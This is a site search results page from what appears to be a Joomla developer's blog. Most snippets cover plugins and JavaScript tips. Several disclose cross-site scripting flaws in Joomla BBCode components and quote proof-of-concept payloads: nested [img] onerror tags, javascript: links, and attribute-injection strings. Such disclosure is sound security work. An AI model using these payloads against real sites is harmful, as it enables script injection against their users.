Search
1.
(Joomla! Extensions/Joomla Plugins)
Joonami is a Joomla! plugin that executes custom JavaScript when a user enters the infamous Konami code. ...
2.
(Joomla! Extensions/Joomla Components)
MiniScript minifies and aggregates all JS & CSS from the JDocument object of Joomla! into a single file for each.
3.
(Code/Joomla!)
... new attributes into a link: style and onmouseover. Giving the link a large size, absolute positioning and a javascript trigger I made the contest site redirect back here.
After the hackme site was no ...
4.
(Comments/All)
Jason,
This is probably due to a JavaScript error, which causes the AJAX submission to fail. This is generally caused by templates or modules loading jQuery without setting it in noConflict mode, although ...
5.
(Other/Other)
This came on TV on Christmas day. I laughed so hard I nearly wet myself.
If this isn't a Discordian ...
6.
(Business/Services)
...
CSS
JavaScript
Mootools
jQuery
PHP
Flash
How much does this cost?
This service costs an hourly fee of $30.
How does it work?
You contact me with your requirements, explained ...
7.
(Code/Joomla!)
...
XSS 1: Nested [img] Tags
[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
XSS 2: JavaScript links
[url=javascript:alert('xss');]http://google.com[/url]
Requires ...
8.
(Code/Joomla!)
As part of a recent project, I needed to open a modal window using JavaScript. Here's how I did it.
First, I made sure the modal behavior was loaded:
JHTML::_('behavior.modal');
Then, in my JavaScript, ...
9.
(Code/JavaScript)
I was working on a bit of script today, and happened upon an interesting happenstance. I was trying to change the text of an element dynamically, and this text needed to include a non-breaking space. My ...
10.
(Other/Other)
... list. Feel free to submit any additions below.
URL Tag Injection
The [url] tag can sometimes be injected with XSS, although this will always require a user to click on the link:
[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
...
11.
(Code/Joomla!)
... default setting upon install.
To execute, simply post a new message. Either toggle the editor to 'off' or use the HTML Source editing button, insert your JavaScript, and submit!
<script>alert('xss');</script>
The ...
12.
(Code/Joomla!)
...
' onmouseover='alert(String.fromCharCode(88,83,83))
' style='color:expression(alert(String.fromCharCode(88,83,83)))
[img] BBCode Tag XSS
[img]http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))[/img]
...
13.
(Code/Joomla!)
... there were going to be, and threw that error.
What I ended up doing is rewriting the JavaScript portion using MooTools markup, as the site I was doing this for always loaded MooTools for its operation. ...
14.
(Code/Joomla!)
... JavaScript function. I also appended a CSS style tag to handle invalid inputs (I could have added these to the administrator template, but I wanted to make sure this change survived a reinstall/upgrade). ...
15.
(Code/Joomla!)
... [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
Nested [url] XSS
[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
...
16.
(Code/JavaScript)
If you've ever done any scripting using the Mootools library that ships with Joomla, perhaps you've come across a situation where you needed to prevent a link from following its assigned location. Mootools ...
17.
(Code/Joomla!)
Well, another XSS vulnerable BBCode implementation, this time on JTag Ticketing System. This is the exact same vulnerability I posted about earlier concerning WebAmoeba.
[url=javascript:alert('xss ...
18.
(Code/Joomla!)
... since when we have two links (a link without comprofiler and a link with comprofiler) this matches both
// but it is even worse when we do not remove javascript links...
$string = preg_replace('/\[(top)?url\](.*?)javascript(.*?)\[\/\\1url\]/si','<span ...
19.
(Code/Joomla!)
... onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
UPDATE: This XSS works in the signature field as well as the post message.
UPDATE 2: Nested [url] tags are similarly vulnerable, ...
20.
(Code/Joomla!)
I found a nice little exploit for WebAmoeba Ticket System 3.0.0, a Joomla help desk component. The vulnerability is with the BBCode library used to parse BBCode tags, as it does not strip javascript: urls ...



